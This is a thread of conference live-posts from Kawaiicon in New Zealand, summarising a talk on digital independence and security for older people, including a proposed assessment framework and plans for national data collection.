If we can't protect our future old selves, how do we protect our elders today?

#Kawaiicon #KawaiiconNZ @lady_nerd
Age doesn't affect us all the same way.

#Kawaiicon #KawaiiconNZ @lady_nerd
We need dynamic security controls in an ever-changing environment to protect us as we age.

#Kawaiicon #KawaiiconNZ @lady_nerd
Should we be digitally active if we can't be independent?

Being digitally active is kind of a human right. It is a substantially increasing part of the day-to-day for all demographics.

#Kawaiicon #KawaiiconNZ @lady_nerd
We need all of these to be happy.

How many of these do we do in the digital space?

Most of them.

#Kawaiicon #KawaiiconNZ @lady_nerd
How do we measure independence?

Diagnostic Frameworks for Daily Living

#Kawaiicon #KawaiiconNZ @lady_nerd
Instrumental Activities of Digital Living - Laura's new framework

#Kawaiicon #KawaiiconNZ @lady_nerd
What do we mean by digitally independent?

#Kawaiicon #KawaiiconNZ @lady_nerd
Links to the project and online assessment.

#Kawaiicon #KawaiiconNZ @lady_nerd
Power of digital attorney and digital guardians are very legally unclear.

#Kawaiicon #KawaiiconNZ @lady_nerd
How can we use this framework?

#Kawaiicon #KawaiiconNZ @lady_nerd
Answers we get can lead to domain specific or holistic solutions.

#Kawaiicon #KawaiiconNZ @lady_nerd
Domain specific responses:
#Kawaiicon #KawaiiconNZ @lady_nerd
Where next?

Mass collection of data!

Let's do a digital independence assessment for a country.

Refine the assessment.

#Kawaiicon #KawaiiconNZ @lady_nerd
Will be linked into opensecurity.nz - a place to find open source information security projects & tools.

#Kawaiicon #KawaiiconNZ @lady_nerd
We're all aging, one day we'll be the people needing help.

#Kawaiicon #KawaiiconNZ @lady_nerd
Awesome talk, thanks @lady_nerd!
#Kawaiicon #KawaiiconNZ
Here is a link to the full @kiwicon/@kawaiiconNZ Day 1 opening:

#Kawaiicon #KawaiiconNZ
And... The Badger Dance featuring @Sputina @Metlstorm and a late appearance by @rafaelmagu:


@kawaiiconNZ #Kawaiicon #KawaiiconNZ